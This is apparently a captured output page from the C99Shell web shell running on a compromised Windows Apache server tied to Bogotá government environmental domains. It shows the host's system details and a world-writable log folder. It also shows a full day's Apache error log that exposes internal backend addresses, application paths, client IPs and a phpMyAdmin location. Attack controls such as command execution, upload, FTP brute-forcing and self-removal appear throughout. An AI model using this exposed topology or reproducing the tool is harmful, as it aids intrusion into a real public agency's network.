!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     error.2017.02.14.log (28.42 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
[Tue Feb 14 01:03:02.371491 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 03:03:14.593759 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 03:24:42.313621 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 04:16:03.741233 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 05:18:54.440456 2017] [ssl:error] [pid 7252:tid 15048] AH02032: Hostname 190.27.245.106 provided via SNI and hostname dama.gov.co provided via HTTP are different
[Tue Feb 14 05:57:35.366732 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 07:19:59.844217 2017] [proxy_http:error] [pid 7252:tid 14684] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.24.56.110:40631] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:19:59.844217 2017] [proxy:error] [pid 7252:tid 14684] [client 190.24.56.110:40631] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_LogoIsoCabezote.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:20:00.047017 2017] [proxy_http:error] [pid 7252:tid 15220] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.24.56.110:40579] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:20:00.047017 2017] [proxy:error] [pid 7252:tid 15220] [client 190.24.56.110:40579] AH00898: Error reading from remote server returned by /isolucionsda/g/Bgr_BarraSuperior.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:39:13.091843 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 07:54:01.903404 2017] [proxy_http:error] [pid 7252:tid 16096] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25148] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:54:01.903404 2017] [proxy:error] [pid 7252:tid 16096] [client 201.245.192.253:25148] AH00898: Error reading from remote server returned by /isolucionsda/MagazinHome.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 07:54:10.779819 2017] [proxy_http:error] [pid 7252:tid 12684] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25147] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 07:54:13.962225 2017] [proxy_http:error] [pid 7252:tid 15168] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25244] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 07:54:13.962225 2017] [proxy:error] [pid 7252:tid 15168] [client 201.245.192.253:25244] AH00898: Error reading from remote server returned by /isolucionsda/BarraFavoritos.asp, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 08:15:07.597027 2017] [proxy_http:error] [pid 7252:tid 15020] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17644] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Feb 14 08:15:09.968231 2017] [proxy_http:error] [pid 7252:tid 15212] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17639] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Feb 14 08:15:17.081843 2017] [proxy_http:error] [pid 7252:tid 15644] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17828] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Feb 14 08:15:35.864276 2017] [proxy_http:error] [pid 7252:tid 12724] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:18246] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/ISOlucionSDA/bancoconocimiento/m/mapadeprocesos__v4/mapadeprocesos__v4.asp
[Tue Feb 14 08:16:26.158765 2017] [proxy_http:error] [pid 7252:tid 16080] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.0.53.26:50739] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 08:16:26.158765 2017] [proxy:error] [pid 7252:tid 16080] [client 190.0.53.26:50739] AH00898: Error reading from remote server returned by /isolucionsda/g/Img_LogoIsoCabezote.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 08:16:26.423965 2017] [proxy_http:error] [pid 7252:tid 14996] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.0.53.26:50741] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 08:16:26.423965 2017] [proxy:error] [pid 7252:tid 14996] [client 190.0.53.26:50741] AH00898: Error reading from remote server returned by /isolucionsda/g/Bgr_BarraSuperior.jpg, referer: http://190.27.245.106/isolucionsda/IdentificaUsuario.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 08:16:38.701187 2017] [proxy_http:error] [pid 7252:tid 15952] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 190.0.53.26:50740] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 08:18:45.030209 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 09:03:39.108141 2017] [proxy_http:error] [pid 7252:tid 15928] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25092] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 09:03:41.775745 2017] [proxy_http:error] [pid 7252:tid 15644] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25538] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 09:03:41.775745 2017] [proxy_http:error] [pid 7252:tid 16040] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25541] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 09:03:41.775745 2017] [proxy:error] [pid 7252:tid 16040] [client 201.245.192.253:25541] AH00898: Error reading from remote server returned by /isolucionsda/Session.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 09:03:42.462147 2017] [proxy_http:error] [pid 7252:tid 16208] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25679] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 09:15:12.062358 2017] [core:error] [pid 7252:tid 15572] (20024)The given path is misformatted or contained invalid characters: [client 5.188.211.35:39629] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Feb 14 09:27:15.700829 2017] [core:error] [pid 7252:tid 15188] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.18:25069] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Feb 14 09:27:26.012447 2017] [core:error] [pid 7252:tid 15188] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.18:25069] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Feb 14 09:27:26.792448 2017] [core:error] [pid 7252:tid 14536] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.18:25524] AH00127: Cannot map HEAD /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Tue Feb 14 09:27:37.135266 2017] [core:error] [pid 7252:tid 14536] (20024)The given path is misformatted or contained invalid characters: [client 125.78.119.18:25524] AH00127: Cannot map GET /www.ambientebogota.gov.co:81 HTTP/1.1 to file
[Tue Feb 14 09:37:45.520735 2017] [proxy_http:error] [pid 7252:tid 13192] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:17080] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 09:37:45.520735 2017] [proxy:error] [pid 7252:tid 13192] [client 201.245.192.253:17080] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 09:39:41.148138 2017] [proxy_http:error] [pid 7252:tid 12700] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:33985] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 09:39:41.148138 2017] [proxy:error] [pid 7252:tid 12700] [client 201.245.192.253:33985] AH00898: Error reading from remote server returned by /IsolucionSDA/Administracion/Graficas/vacio1x1.gif, referer: http://190.27.245.106/IsolucionSDA/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 10:03:44.682074 2017] [proxy_http:error] [pid 7252:tid 15020] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:26491] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 10:03:44.682074 2017] [proxy:error] [pid 7252:tid 15020] [client 201.245.192.253:26491] AH00898: Error reading from remote server returned by /IsolucionSDA/javascript/ClickValidation.js, referer: http://190.27.245.106/IsolucionSDA/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 10:11:42.074112 2017] [core:error] [pid 7252:tid 12456] (20024)The given path is misformatted or contained invalid characters: [client 106.120.34.15:47222] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Feb 14 13:00:35.464911 2017] [core:error] [pid 7252:tid 14996] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.119:22743] AH00127: Cannot map GET /www.ambientebogota.gov.co:81/ HTTP/1.1 to file
[Tue Feb 14 13:14:16.962353 2017] [proxy:error] [pid 7252:tid 14700] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.51:8399 (172.22.1.51) failed
[Tue Feb 14 13:14:16.962353 2017] [proxy:error] [pid 7252:tid 14700] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.51) for 60s
[Tue Feb 14 13:14:16.962353 2017] [proxy_http:error] [pid 7252:tid 14700] [client 152.61.128.50:58726] AH01114: HTTP: failed to make connection to backend: 172.22.1.51
[Tue Feb 14 13:14:17.149554 2017] [proxy:error] [pid 7252:tid 14700] AH00940: HTTP: disabled connection for (172.22.1.51)
[Tue Feb 14 13:14:17.352354 2017] [proxy:error] [pid 7252:tid 14700] AH00940: HTTP: disabled connection for (172.22.1.51)
[Tue Feb 14 13:30:06.660822 2017] [proxy_http:error] [pid 7252:tid 15736] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:20609] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue Feb 14 13:30:06.660822 2017] [proxy:error] [pid 7252:tid 15736] [client 201.245.192.253:20609] AH00898: Error reading from remote server returned by /isolucionsda/, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue Feb 14 13:40:12.441086 2017] [proxy_http:error] [pid 7252:tid 16000] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34927] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:12.441086 2017] [proxy:error] [pid 7252:tid 16000] [client 201.245.192.253:34927] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:14.562689 2017] [proxy_http:error] [pid 7252:tid 15168] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:34998] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:14.562689 2017] [proxy:error] [pid 7252:tid 15168] [client 201.245.192.253:34998] AH00898: Error reading from remote server returned by /isolucionsda/FrameSetGeneral.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:16.933893 2017] [proxy_http:error] [pid 7252:tid 16388] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22592] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:16.933893 2017] [proxy:error] [pid 7252:tid 16388] [client 201.245.192.253:22592] AH00898: Error reading from remote server returned by /isolucionsda/Logout.asp, referer: http://190.27.245.106/isolucionsda/Encabezado.asp?Pagina=ListadoMaestroDocumentos3.asp
[Tue Feb 14 13:40:29.881916 2017] [proxy_http:error] [pid 7252:tid 15952] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22943] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 13:40:29.881916 2017] [proxy:error] [pid 7252:tid 15952] [client 201.245.192.253:22943] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 13:40:29.944316 2017] [proxy_http:error] [pid 7252:tid 15076] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:22942] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 13:40:29.944316 2017] [proxy:error] [pid 7252:tid 15076] [client 201.245.192.253:22942] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 13:59:35.704929 2017] [proxy_http:error] [pid 7252:tid 15136] (20014)Internal error: [client 201.245.192.253:21297] AH01102: error reading status line from remote server 172.22.1.61:8080, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml
[Tue Feb 14 13:59:35.704929 2017] [proxy:error] [pid 7252:tid 15136] [client 201.245.192.253:21297] AH00898: Error reading from remote server returned by /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarProfesionPersonalSolicitado.xhtml, referer: http://190.27.245.106/sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/personalSolicitadoSolicitudProceso.xhtml
[Tue Feb 14 14:13:26.858789 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 14:17:51.014053 2017] [core:error] [pid 7252:tid 15480] (20024)The given path is misformatted or contained invalid characters: [client 157.55.39.119:4572] AH00127: Cannot map GET /... HTTP/1.1 to file
[Tue Feb 14 14:51:20.236182 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 15:22:15.999841 2017] [proxy_http:error] [pid 7252:tid 14868] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:27439] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/FrameSetGeneral.asp?Pagina=BancoConocimiento/M/MECINuevo/MECINuevo.asp&IdModulo=16
[Tue Feb 14 16:10:31.709127 2017] [proxy_http:error] [pid 7252:tid 14976] (OS 10054)An existing connection was forcibly closed by the remote host.  : [client 201.245.192.253:10299] AH01110: error reading response, referer: http://190.27.245.106/IsolucionSDA/ListadoMaestroDocumentosExternos3.asp?Accion=Consultar&Mande=Buscar&paginaactual=14
[Tue Feb 14 16:25:18.400085 2017] [core:error] [pid 7252:tid 15204] (20024)The given path is misformatted or contained invalid characters: [client 52.3.105.23:47166] AH00127: Cannot map GET /galeria/carrusel/Carrusel/jquery-ui-%0A%0A1.8.13.custom.min.js HTTP/1.1 to file
[Tue Feb 14 16:35:30.264359 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 16:50:47.218370 2017] [proxy:error] [pid 7252:tid 15704] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Tue Feb 14 16:50:47.218370 2017] [proxy:error] [pid 7252:tid 15704] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Tue Feb 14 16:50:47.218370 2017] [proxy_http:error] [pid 7252:tid 15704] [client 181.63.240.91:56679] AH01114: HTTP: failed to make connection to backend: 172.22.1.32, referer: http://www.ambientebogota.gov.co/web/intranet/aplicaciones-para-acceder-fuera-de-la-sda
[Tue Feb 14 16:55:01.311616 2017] [proxy_http:error] [pid 7252:tid 14964] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.82.110.125:51305] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=SucursalSeleccion.asp&CargaPagina=ModuloProcesos&IdModulo=3
[Tue Feb 14 17:03:17.891688 2017] [proxy:error] [pid 7252:tid 14740] (OS 10060)A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.  : AH00957: HTTP: attempt to connect to 172.22.1.32:80 (172.22.1.32) failed
[Tue Feb 14 17:03:17.891688 2017] [proxy:error] [pid 7252:tid 14740] AH00959: ap_proxy_connect_backend disabling worker for (172.22.1.32) for 60s
[Tue Feb 14 17:03:17.891688 2017] [proxy_http:error] [pid 7252:tid 14740] [client 201.245.192.253:14575] AH01114: HTTP: failed to make connection to backend: 172.22.1.32, referer: http://172.22.1.122:8090/group/intranet/recursos
[Tue Feb 14 17:09:39.265558 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 17:09:39.265558 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 17:27:46.058067 2017] [proxy_http:error] [pid 7252:tid 15556] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 186.82.110.125:51678] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 17:27:46.058067 2017] [proxy:error] [pid 7252:tid 15556] [client 186.82.110.125:51678] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraTitulos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 17:35:42.295704 2017] [proxy_http:error] [pid 7252:tid 15756] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:19366] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=I/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5.asp&Id_Articulo=10594
[Tue Feb 14 17:35:42.295704 2017] [proxy:error] [pid 7252:tid 15756] [client 201.245.192.253:19366] AH00898: Error reading from remote server returned by /ISOlucionSDA/BancoConocimiento/I/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5.asp, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/FrameSetVistaPrevia.asp?Articulo=I/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5/Inspeccion_VigilanciayControldelasEntidadesSinAnimodeLucroAmbientales_v5.asp&Id_Articulo=10594
[Tue Feb 14 17:40:01.209358 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.
[Tue Feb 14 17:42:08.021981 2017] [proxy_http:error] [pid 7252:tid 15104] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:12581] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/bancoconocimiento/D/DECRETO624DE1989/DECRETO624DE1989.asp?IdArticulo=8726
[Tue Feb 14 17:59:50.040646 2017] [proxy_http:error] [pid 7252:tid 15076] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25589] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 17:59:50.040646 2017] [proxy:error] [pid 7252:tid 15076] [client 201.245.192.253:25589] AH00898: Error reading from remote server returned by /IsolucionSDA/MagazinHome.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina1=FrameSetGeneral.asp&
[Tue Feb 14 17:59:55.812657 2017] [proxy_http:error] [pid 7252:tid 12724] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:25648] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 17:59:55.812657 2017] [proxy:error] [pid 7252:tid 12724] [client 201.245.192.253:25648] AH00898: Error reading from remote server returned by /IsolucionSDA/BarraFavoritos.asp, referer: http://190.27.245.106/IsolucionSDA/FrameSetGeneral.asp?Pagina=Menu.asp&IdModulo=4
[Tue Feb 14 18:13:22.427673 2017] [proxy_http:error] [pid 7252:tid 12668] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16516] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/VistaPreviaAtras.asp?Id_Articulo=10594
[Tue Feb 14 18:13:22.427673 2017] [proxy:error] [pid 7252:tid 12668] [client 201.245.192.253:16516] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/SalaEdicion/Articulo.asp, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/VistaPreviaAtras.asp?Id_Articulo=10594
[Tue Feb 14 18:13:48.776120 2017] [proxy_http:error] [pid 7252:tid 14740] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16785] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10594
[Tue Feb 14 18:13:48.776120 2017] [proxy:error] [pid 7252:tid 14740] [client 201.245.192.253:16785] AH00898: Error reading from remote server returned by /isolucionsda/javascript/ClickValidation.js, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10594
[Tue Feb 14 18:26:46.079685 2017] [access_compat:error] [pid 7252:tid 14996] [client 89.248.163.3:54358] AH01797: client denied by server configuration: E:/nuevo/phpMyAdmin/scripts
[Tue Feb 14 18:29:13.827544 2017] [proxy_http:error] [pid 7252:tid 15252] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:14033] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10594
[Tue Feb 14 18:29:13.827544 2017] [proxy:error] [pid 7252:tid 15252] [client 201.245.192.253:14033] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/Graficas/vacio1x1.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp?Id_Articulo=10594
[Tue Feb 14 18:32:21.917075 2017] [proxy_http:error] [pid 7252:tid 12644] (OS 10053)An established connection was aborted by the software in your host machine.  : [client 201.245.192.253:16041] AH01102: error reading status line from remote server 172.22.1.31:80, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 18:32:21.917075 2017] [proxy:error] [pid 7252:tid 12644] [client 201.245.192.253:16041] AH00898: Error reading from remote server returned by /isolucionsda/Administracion/SalaEdicion/g/GifTransparente.gif, referer: http://190.27.245.106/isolucionsda/Administracion/SalaEdicion/Articulo.asp
[Tue Feb 14 23:32:13.589676 2017] [mpm_winnt:warn] [pid 7252:tid 17020] (OS 64)The specified network name is no longer available.  : AH00341: winnt_accept: Asynchronous AcceptEx failed.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--